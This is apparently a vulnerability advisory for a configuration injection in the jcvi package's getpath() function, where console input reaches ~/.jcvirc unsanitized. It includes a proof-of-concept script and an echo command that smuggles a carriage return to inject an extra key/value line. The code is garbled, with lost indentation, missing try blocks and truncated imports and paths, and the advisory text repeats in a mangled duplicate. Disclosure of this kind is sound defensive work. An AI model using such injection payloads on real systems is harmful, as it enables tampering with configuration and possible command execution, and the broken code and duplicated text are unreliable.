A configuration injection happens when user input is considered by the application in an unsanitized format and can reach the configuration file. A malicious user may craft a special payload that may lead to a command injection.
The vulnerable code snippet is /jcvi/apps/ Under some circumstances a user input is retrieved and stored within the fullpath
variable which reaches the configuration file ~/.jcvirc
fullpath = input(msg).strip()
config.set(PATH, name, fullpath)
I ripped a part of the codebase into a runnable PoC as follows. All the PoC does is call the getpath()
function under some circumstances.
from configparser import (
import errno
import os
import sys
import os.path as op
import shutil
import signal
import sys
import logging
def is_exe(fpath):
return op.isfile(fpath) and os.access(fpath, os.X_OK)
def which(program):
Emulates the unix which command.
>>> which("cat")
>>> which("nosuchprogram")
fpath, fname = op.split(program)
if fpath:
if is_exe(program):
return program
for path in os.environ["PATH"].split(os.pathsep):
exe_file = op.join(path, program)
if is_exe(exe_file):
return exe_file
return None
def getpath(cmd, name=None, url=None, cfg="~/.jcvirc", warn="exit"):
Get install locations of common binaries
First, check ~/.jcvirc file to get the full path
If not present, ask on the console and store
p = which(cmd) # if in PATH, just returns it
if p:
return p
PATH = "Path"
config = RawConfigParser()
cfg = op.expanduser(cfg)
changed = False
if op.exists(cfg):
assert name is not None, "Need a program name"
fullpath = config.get(PATH, name)
except NoSectionError:
changed = True
fullpath = config.get(PATH, name)
except NoOptionError:
msg = "=== Configure path for {0} ===\n".format(name, cfg)
if url:
msg += "URL: {0}\n".format(url)
msg += "[Directory that contains `{0}`]: ".format(cmd)
fullpath = input(msg).strip()
config.set(PATH, name, fullpath)
changed = True
path = op.join(op.expanduser(fullpath), cmd)
if warn == "exit":
assert is_exe(path), "***ERROR: Cannot execute binary `{0}`. ".format(path)
except AssertionError as e:
sys.exit("{0!s}Please verify and rerun.".format(e))
if changed:
configfile = open(cfg, "w")
logging.debug("Configuration written to `{0}`.".format(cfg))
return path
# Call to getpath
path = getpath("not-part-of-path", name="CLUSTALW2", warn="warn")
To run the PoC, you need to remove the config file ~/.jcvirc
to emulate the first run,
# Run the PoC with the payload
echo -e "e\rvvvvvvvv = zzzzzzzz\n" | python3

You can notice the random key/value characters vvvvvvvv = zzzzzzzz
were successfully injected.
The impact of a configuration injection may vary. Under some conditions, it may lead to command injection if there is for instance shell code execution from the configuration file values.
A configuration injection happens when user input is considered by the application in an unsanitized format and can reach the configuration file. A malicious user may craft a special payload that may lead to a command injection.
The vulnerable code snippet is /jcvi/apps/ Under some circumstances a user input is retrieved and stored within the
variable which reaches the configuration file~/.jcvirc
.I ripped a part of the codebase into a runnable PoC as follows. All the PoC does is call the
function under some circumstances.To run the PoC, you need to remove the config file
to emulate the first run,You can notice the random key/value characters
vvvvvvvv = zzzzzzzz
were successfully injected.Impact
The impact of a configuration injection may vary. Under some conditions, it may lead to command injection if there is for instance shell code execution from the configuration file values.